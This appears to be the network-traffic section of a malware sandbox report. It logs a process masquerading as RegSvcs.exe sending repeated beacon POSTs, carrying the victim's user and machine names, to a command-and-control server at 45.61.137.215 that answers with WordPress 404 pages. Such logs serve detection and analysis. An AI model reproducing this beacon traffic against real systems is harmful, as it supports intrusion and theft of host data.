May 29, 2024 15:43:33.221262932 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:33.221272945 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:33.221434116 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:33.221486092 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	49747	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:33.478549957 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:33.486953020 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:35.962335110 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:34 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:35.962393999 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:35.962434053 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:35.962452888 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:43:35.962486029 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:43:35.962505102 CEST	1236	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:43:35.962521076 CEST	1236	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
May 29, 2024 15:43:35.962538958 CEST	1120	IN	Data Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
May 29, 2024 15:43:35.962558985 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:35.962599039 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	49748	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:36.155571938 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:36.160568953 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:38.566493034 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:36 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:38.566529989 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:38.566546917 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:38.566564083 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:43:38.566579103 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:43:38.566595078 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:43:38.567006111 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:38.567048073 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:43:38.567063093 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:43:38.567078114 CEST	1236	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	49749	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:38.811866999 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:38.816879988 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:41.307538986 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:39 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:41.307600975 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:41.307637930 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:41.307672977 CEST	672	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
